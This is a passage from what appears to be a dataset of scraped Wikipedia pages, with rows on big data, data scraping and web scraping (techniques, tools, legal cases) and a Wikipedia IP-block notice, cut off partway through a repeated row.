all human behaviors for the purpose of marketing. 113 The increasingly digital world of rapid datafication makes this idea relevant to marketing because the amount of data constantly grows exponentially. It is predicted to increase from 44 to 163 zettabytes within the span of five years. 114 The size of big data can often be difficult to navigate for marketers. 115 As a result, adopters of big data may find themselves at a disadvantage. Algorithmic findings can be difficult to achieve with such large datasets. 116 Big data in marketing is a highly lucrative tool that can be used for large corporations, its value being as a result of the possibility of predicting significant trends, interests, or statistical outcomes in a consumer-based manner. 117 There are three significant factors in the use of big data in marketing: Examples of uses of big data in public services: Big data can be used to improve training and understanding competitors, using sport sensors. It is also possible to predict winners in a match using big data analytics. 163 Future performance of players could be predicted as well. 164 Thus, players' value and salary is determined by data collected throughout the season. 165 In Formula One races, race cars with hundreds of sensors generate terabytes of data. These sensors collect data points from tire pressure to fuel burn efficiency. 166 Based on the data, engineers and data analysts decide whether adjustments should be made in order to win a race. Besides, using big data, race teams try to predict the time they will finish the race beforehand, based on simulations using data collected over the season. 167 During the COVID 19 pandemic, big data was raised as a way to minimise the impact of the disease. Significant applications of big data included minimising the spread of the virus, case identification and development of medical treatment. 173 Governments used big data to track infected people to minimise spread. Early adopters included China, Taiwan, South Korea, and Israel. 174 175 176 Encrypted search and cluster formation in big data were demonstrated in March 2014 at the American Society of Engineering Education. Gautam Siwach engaged at Tackling the challenges of Big Data by MIT Computer Science and Artificial Intelligence Laboratory and Amir Esmailpour at the UNH Research Group investigated the key features of big data as the formation of clusters and their interconnections. They focused on the security of big data and the orientation of the term towards the presence of different types of data in an encrypted form at cloud interface by providing the raw definitions and real-time examples within the technology. Moreover, they proposed an approach for identifying the encoding technique to advance towards an expedited search over encrypted text leading to the security enhancements in big data. 177 In March 2012, The White House announced a national "Big Data Initiative" that consisted of six federal departments and agencies committing more than $200 million to big data research projects. 178 The initiative included a National Science Foundation "Expeditions in Computing" grant of $10 million over five years to the AMPLab 179 at the University of California, Berkeley. 180 The AMPLab also received funds from DARPA, and over a dozen industrial sponsors and uses big data to attack a wide range of problems from predicting traffic congestion 181 to fighting cancer. 182 The White House Big Data Initiative also included a commitment by the Department of Energy to provide $25 million in funding over five years to establish the Scalable Data Management, Analysis and Visualization (SDAV) Institute, 183 led by the Energy Department's Lawrence Berkeley National Laboratory. The SDAV Institute aims to bring together the expertise of six national laboratories and seven universities to develop new tools to help scientists manage and visualize data on the department's supercomputers. The U.S. state of Massachusetts announced the Massachusetts Big Data Initiative in May 2012, which provides funding from the state government and private companies to a variety of research institutions. 184 The Massachusetts Institute of Technology hosts the Intel Science and Technology Center for Big Data in the MIT Computer Science and Artificial Intelligence Laboratory, combining government, corporate, and institutional funding and research efforts. 185 The European Commission is funding the two-year-long Big Data Public Private Forum through their Seventh Framework Program to engage companies, academics and other stakeholders in discussing big data issues. The project aims to define a strategy in terms of research and innovation to guide supporting actions from the European Commission in the successful implementation of the big data economy. Outcomes of this project will be used as input for Horizon 2020, their next framework program. 186 The British government announced in March 2014 the founding of the Alan Turing Institute, named after the computer pioneer and code-breaker, which will focus on new ways to collect and analyze large data sets. 187 At the University of Waterloo Stratford Campus Canadian Open Data Experience (CODE) Inspiration Day, participants demonstrated how using data visualization can increase the understanding and appeal of big data sets and communicate their story to the world. 188 Computational social sciences Anyone can use application programming interfaces (APIs) provided by big data holders, such as Google and Twitter, to do research in the social and behavioral sciences. 189 Often these APIs are provided for free. 189 Tobias Preis et al. used Google Trends data to demonstrate that Internet users from countries with a higher per capita gross domestic products (GDPs) are more likely to search for information about the future than information about the past. The findings suggest there may be a link between online behaviors and real-world economic indicators. 190 191 192 The authors of the study examined Google queries logs made by ratio of the volume of searches for the coming year (2011) to the volume of searches for the previous year (2009), which they call the "future orientation index". 193 They compared the future orientation index to the per capita GDP of each country, and found a strong tendency for countries where Google users inquire more about the future to have a higher GDP. Tobias Preis and his colleagues Helen Susannah Moat and H. Eugene Stanley introduced a method to identify online precursors for stock market moves, using trading strategies based on search volume data provided by Google Trends. 194 Their analysis of Google search volume for 98 terms of varying financial relevance, published in Scientific Reports, 195 suggests that increases in search volume for financially relevant search terms tend to precede large losses in financial markets. 196 197 198 199 200 201 202 Big data sets come with algorithmic challenges that previously did not exist. Hence, there is seen by some to be a need to fundamentally change the processing ways. 203 A research question that is asked about big data sets is whether it is necessary to look at the full data to draw certain conclusions about the properties of the data or if is a sample is good enough. The name big data itself contains a term related to size and this is an important characteristic of big data. But sampling enables the selection of right data points from within the larger data set to estimate the characteristics of the whole population. In manufacturing different types of sensory data such as acoustics, vibration, pressure, current, voltage, and controller data are available at short time intervals. To predict downtime it may not be necessary to look at all the data but a sample may be sufficient. Big data can be broken down by various data point categories such as demographic, psychographic, behavioral, and transactional data. With large sets of data points, marketers are able to create and use more customized segments of consumers for more strategic targeting. Critiques of the big data paradigm come in two flavors: those that question the implications of the approach itself, and those that question the way it is currently done. 204 One approach to this criticism is the field of critical data studies. "A crucial problem is that we do not know much about the underlying empirical micro-processes that lead to the emergence of the se typical network characteristics of Big Data. 25 page needed In their critique, Snijders, Matzat, and Reips point out that often very strong assumptions are made about mathematical properties that may not at all reflect what is really going on at the level of micro-processes. Mark Graham has leveled broad critiques at Chris Anderson's assertion that big data will spell the end of theory: 205 focusing in particular on the notion that big data must always be contextualized in their social, economic, and political contexts. 206 Even as companies invest eight- and nine-figure sums to derive insight from information streaming in from suppliers and customers, less than 40% of employees have sufficiently mature processes and skills to do so. To overcome this insight deficit, big data, no matter how comprehensive or well analyzed, must be complemented by "big judgment", according to an article in the Harvard Business Review. 207 Much in the same line, it has been pointed out that the decisions based on the analysis of big data are inevitably "informed by the world as it was in the past, or, at best, as it currently is". 67 page needed Fed by a large number of data on past experiences, algorithms can predict future development if the future is similar to the past. 208 If the system's dynamics of the future change (if it is not a stationary process), the past can say little about the future. In order to make predictions in changing environments, it would be necessary to have a thorough understanding of the systems dynamic, which requires theory. 208 As a response to this critique Alemany Oliver and Vayre suggest to use "abductive reasoning as a first step in the research process in order to bring context to consumers' digital traces and make new theories emerge". 209 Additionally, it has been suggested to combine big data approaches with computer simulations, such as agent-based models 67 page needed and complex systems. Agent-based models are increasingly getting better in predicting the outcome of social complexities of even unknown future scenarios through computer simulations that are based on a collection of mutually interdependent algorithms. 210 211 Finally, the use of multivariate methods that probe for the latent structure of the data, such as factor analysis and cluster analysis, have proven useful as analytic approaches that go well beyond the bi-variate approaches (e.g. contingency tables) typically employed with smaller data sets. In health and biology, conventional scientific approaches are based on experimentation. For these approaches, the limiting factor is the relevant data that can confirm or refute the initial hypothesis. 212 A new postulate is accepted now in biosciences: the information provided by the data in huge volumes (omics) without prior hypothesis is complementary and sometimes necessary to conventional approaches based on experimentation. 213 214 In the massive approaches it is the formulation of a relevant hypothesis to explain the data that is the limiting factor. 215 The search logic is reversed and the limits of induction ("Glory of Science and Philosophy scandal", C. D. Broad, 1926) are to be considered. citation needed Privacy advocates are concerned about the threat to privacy represented by increasing storage and integration of personally identifiable information; expert panels have released various policy recommendations to conform practice to expectations of privacy. 216 The misuse of big data in several cases by media, companies, and even the government has allowed for abolition of trust in almost every fundamental institution holding up society. 217 Barocas and Nissenbaum argue that one way of protecting individual users is by being informed about the types of information being collected, with whom it is shared, under what constraints and for what purposes. 218 The "V" model of big data is concerning as it centers around computational scalability and lacks in a loss around the perceptibility and understandability of information. This led to the framework of cognitive big data, which characterizes big data applications according to: 219 Large data sets have been analyzed by computing machines for well over a century, including the US census analytics performed by IBM's punch-card machines which computed statistics including means and variances of populations across the whole continent. In more recent decades, science experiments such as CERN have produced data on similar scales to current commercial "big data". However, science experiments have tended to analyze their data using specialized custom-built high-performance computing (super-computing) clusters and grids, rather than clouds of cheap commodity computers as in the current commercial wave, implying a difference in both culture and technology stack. Ulf-Dietrich Reips and Uwe Matzat wrote in 2014 that big data had become a "fad" in scientific research. 189 Researcher Danah Boyd has raised concerns about the use of big data in science neglecting principles such as choosing a representative sample by being too concerned about handling the huge amounts of data. 220 This approach may lead to results that have a bias in one way or another. 221 Integration across heterogeneous data resources—some that might be considered big data and others not—presents formidable logistical as well as analytical challenges, but many researchers argue that such integrations are likely to represent the most promising new frontiers in science. 222 In the provocative article "Critical Questions for Big Data", 223 the authors title big data a part of mythology: "large data sets offer a higher form of intelligence and knowledge ... , with the aura of truth, objectivity, and accuracy". Users of big data are often "lost in the sheer volume of numbers", and "working with Big Data is still subjective, and what it quantifies does not necessarily have a closer claim on objective truth". 223 Recent developments in BI domain, such as pro-active reporting especially target improvements in the usability of big data, through automated filtering of non-useful data and correlations. 224 Big structures are full of spurious correlations 225 either because of non-causal coincidences (law of truly large numbers), solely nature of big randomness 226 (Ramsey theory), or existence of non-included factors so the hope, of early experimenters to make large databases of numbers "speak for themselves" and revolutionize scientific method, is questioned. 227 Catherine Tucker has pointed to "hype" around big data, writing "By itself, big data is unlikely to be valuable. The article explains: "The many contexts where data is cheap relative to the cost of retaining talent to process it, suggests that processing skills are more important than data itself in creating value for a firm. 228 Big data analysis is often shallow compared to analysis of smaller data sets. 229 In many big data projects, there is no large data analysis happening, but the challenge is the extract, transform, load part of data pre-processing. 229 Big data is a buzzword and a "vague term", 230 231 but at the same time an "obsession" 231 with entrepreneurs, consultants, scientists, and the media. Big data showcases such as Google Flu Trends failed to deliver good predictions in recent years, overstating the flu outbreaks by a factor of two. Similarly, Academy awards and election predictions solely based on Twitter were more often off than on target. Big data often poses the same challenges as small data; adding more data does not solve problems of bias, but may emphasize other problems. In particular data sources such as Twitter are not representative of the overall population, and results drawn from such sources may then lead to wrong conclusions. Google Translate—which is based on big data statistical analysis of text—does a good job at translating web pages. However, results from specialized domains may be dramatically skewed. On the other hand, big data may also introduce new problems, such as the multiple comparisons problem: simultaneously testing a large set of hypotheses is likely to produce many false results that mistakenly appear significant. Ioannidis argued that "most published research findings are false" 232 due to essentially the same effect: when many scientific teams and researchers each perform many experiments (i.e. process a big amount of scientific data; although not with big data technology), the likelihood of a "significant" result being false grows fast even more so, when only positive results are published. Furthermore, big data analytics results are only as good as the model on which they are predicated. In an example, big data took part in attempting to predict the results of the 2016 U.S. presidential election 233 with varying degrees of success. Big data has been used in policing and surveillance by institutions like law enforcement and corporations. 234 Due to the less visible nature of data-based surveillance as compared to traditional methods of policing, objections to big data policing are less likely to arise. According to Sarah Brayne's Big Data Surveillance: The Case of Policing, 235 big data policing can reproduce existing societal inequalities in three ways: If these potential problems are not corrected or regulated, the effects of big data policing may continue to shape societal hierarchies. Conscientious usage of big data policing could prevent individual level biases from becoming institutional biases, Brayne also notes. |
73 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-11 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
74 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-24 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
75 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=16 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
76 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-20 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of 